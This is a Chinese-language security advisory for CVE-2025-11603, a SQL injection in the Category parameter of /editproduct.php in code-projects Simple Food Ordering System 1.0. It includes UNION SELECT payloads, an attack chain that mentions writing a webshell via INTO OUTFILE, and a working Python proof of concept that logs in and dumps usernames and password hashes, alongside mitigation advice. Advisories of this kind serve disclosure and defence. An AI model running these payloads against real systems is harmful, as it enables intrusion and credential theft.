CVE-2025-11603：Simple Food Ordering System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11603

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Food Ordering System

漏洞概述

CVE-2025-11603是code-projects Simple Food Ordering System 1.0版本中存在的一个SQL注入安全漏洞。该漏洞位于/editproduct.php文件中，具体涉及对Category参数的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句注入到数据库查询中，从而绕过正常的安全验证机制。

根据CVSS 3.1评分体系，该漏洞的评分为6.3分，属于中危级别。攻击者可以通过网络远程发起攻击，需要具备低权限认证（如普通用户账号），但无需用户交互即可完成攻击。一旦成功利用，攻击者可以读取、修改或删除数据库中的敏感数据，对系统的机密性、完整性和可用性均造成低级别的影响。

该漏洞的利用代码已经被公开发布，任何具备基本攻击能力的黑客都可以轻松获取并利用此漏洞。由于Simple Food Ordering System是一个面向餐饮行业的在线订购系统，涉及用户订单信息、支付数据等敏感内容，因此该漏洞可能对企业和用户的数据安全构成实质性威胁。建议相关用户尽快采取防护措施，避免遭受数据泄露或篡改攻击。

技术细节

该漏洞的核心问题在于/editproduct.php文件对Category参数的处理未进行充分的输入验证和参数化处理。当用户通过POST或GET请求提交Category参数时，应用程序直接将用户输入拼接到SQL查询语句中，而没有使用预编译语句（Prepared Statements）或存储过程等安全防护措施。

攻击者可以利用经典的SQL注入技术，通过在Category参数中插入单引号（'）、UNION SELECT、OR 1=1等SQL语句片段来操纵数据库查询。例如，攻击者可以构造如下payload：

Category=food' UNION SELECT 1,user(),database(),4,5-- -

这种payload会导致原始的SQL查询结构发生变化，使数据库执行攻击者预期的恶意SQL语句。攻击成功后，攻击者可以：
1. 通过UNION查询读取数据库中的任意表数据，包括用户表、订单表等；
2. 利用information_schema获取数据库结构信息；
3. 通过堆叠查询（stacked queries）执行INSERT、UPDATE、DELETE等写操作；
4. 在某些MySQL配置下，利用LOAD_FILE()读取服务器文件，或使用INTO OUTFILE写入Webshell。

由于该漏洞需要低权限认证（PR:L），攻击者需要先注册一个普通用户账号，然后登录系统后再发起注入攻击。这种认证要求在一定程度上降低了漏洞的严重性，但仍然对系统安全构成显著威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为code-projects Simple Food Ordering System 1.0，通过搜索引擎或Shodan等工具查找暴露在公网上的目标实例。

STEP 2

步骤2：获取低权限凭证

由于漏洞利用需要低权限认证（PR:L），攻击者需要在目标系统上注册一个普通用户账号，或通过其他途径获取有效凭证。

STEP 3

步骤3：登录系统

使用获取的凭证登录系统，获取有效的Session Cookie，为后续攻击建立认证会话。

STEP 4

步骤4：构造SQL注入Payload

针对/editproduct.php文件的Category参数，构造恶意SQL注入payload，如UNION SELECT语句或布尔盲注语句。

STEP 5

步骤5：发起注入攻击

通过POST请求向/editproduct.php提交包含恶意payload的Category参数，触发SQL注入漏洞。

STEP 6

步骤6：数据提取与利用

成功利用后，攻击者可以读取数据库中的用户凭证、订单信息等敏感数据，或进一步执行写操作破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11603 - Simple Food Ordering System SQL Injection PoC
# Vulnerability: SQL Injection in /editproduct.php via Category parameter
# Author: Security Researcher

import requests
import sys

# Target configuration
TARGET_URL = "http://target.com/editproduct.php"
LOGIN_URL = "http://target.com/login.php"

# Attacker credentials (low privilege account required)
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

def exploit_sql_injection(target_url, session_cookie):
    """
    Exploit SQL injection in Category parameter of editproduct.php
    """
    # SQL Injection payload to extract database version
    payload = "1' UNION SELECT 1,version(),database(),user(),5-- -"
    
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    data = {
        "Category": payload,
        "id": "1"
    }
    
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            # Check if injection was successful
            if "MySQL" in response.text or "MariaDB" in response.text:
                print("[+] SQL Injection successful!")
                print(f"[+] Response length: {len(response.text)}")
                return True
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def extract_data(target_url, session_cookie, query):
    """
    Extract data using UNION-based SQL injection
    """
    # Generic UNION-based injection template
    payload = f"1' UNION SELECT 1,({query}),3,4,5-- -"
    
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    data = {"Category": payload, "id": "1"}
    response = requests.post(target_url, data=data, headers=headers)
    return response.text

if __name__ == "__main__":
    # Step 1: Login to obtain session
    session = requests.Session()
    login_data = {"username": USERNAME, "password": PASSWORD}
    session.post(LOGIN_URL, data=login_data)
    
    # Step 2: Exploit SQL injection
    if exploit_sql_injection(TARGET_URL, session.cookies.get_dict()):
        # Step 3: Extract sensitive data
        users_data = extract_data(
            TARGET_URL, 
            session.cookies.get_dict(),
            "SELECT GROUP_CONCAT(username,0x3a,password) FROM users"
        )
        print(f"[+] Extracted users: {users_data}")

影响范围

code-projects Simple Food Ordering System 1.0

防御指南

临时缓解措施

在官方发布补丁之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署SQL注入防护规则，拦截针对Category参数的恶意请求；2）在Web服务器层面配置输入过滤规则，对单引号、双引号、SQL关键字等特殊字符进行过滤；3）限制/editproduct.php文件的访问权限，仅允许可信IP地址访问；4）监控数据库日志，检测异常的SQL查询行为；5）定期备份数据库，以便在遭受攻击后能够快速恢复数据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11603
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11603
3 Details https://www.cvedetails.com/cve/CVE-2025-11603/
4 VulDB https://vuldb.com/cve/CVE-2025-11603
5 Link https://code-projects.org/
6 Link https://github.com/xmqaq/cve/issues/4
7 Link https://vuldb.com/?ctiid.327925
8 Link https://vuldb.com/?id.327925
9 Link https://vuldb.com/?submit.671957
10 Link https://github.com/xmqaq/cve/issues/4